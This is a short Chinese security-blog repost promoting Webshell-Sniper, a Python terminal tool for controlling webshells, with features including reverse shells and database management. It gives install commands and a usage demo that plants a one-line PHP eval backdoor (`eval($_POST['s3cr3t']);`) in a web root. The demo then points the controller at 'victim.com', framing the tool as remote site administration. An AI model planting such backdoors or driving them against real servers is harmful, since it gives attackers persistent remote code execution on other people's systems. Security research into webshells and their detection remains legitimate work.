Webshell-Sniper是一款使用Python编写的基于终端的Webshell管理器,和以往我们分享的Webshell管理工具有所不同,所有操作都在终端中完成。使用它可对您的网站进行远程管理。虽然它没有图形化的GUI也没有WEB界面,但这样的操作也是另有一翻感觉。
功能
-
基于终端的shell交互
-
反向连接shell(这就能做非常多的事了)
-
数据库管理
![基于终端的Webshell管理器-Webshell-Sniper]( "基于终端的Webshell管理器-Webshell-Sniper")
Webshell-Sniper安装与使用
环境
服务端 :Linuxpython2.7客户端 :apache2.4php7.0
需要注意的是,Webshell-Sniper服务端只支持Unix系统环境。
安装
gitclone https://github.com/WangYihang/Webshell-SnipercdWebshell-Sniperpipinstall -r requirements.txt
使用
Usage :python webshell-sniper.py [URL] [METHOD] [AUTH]Example :python webshell-sniper.py http://127.0.0.1/c.php POST c# Demo# cat /var/www/html/index.phpeval($_POST['s3cr3t']);# python webshell-sniper.py http://victim.com/index.php POST s3cr3t...
Webshell-Sniper视频演示
https://www.youtube.com/watch?v=iAUwb8SSS4shttps://asciinema.org/a/130893
侵权请私聊公众号删文
原文始发于微信公众号(LemonSec):基于终端的Webshell管理器-Webshell-Sniper
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论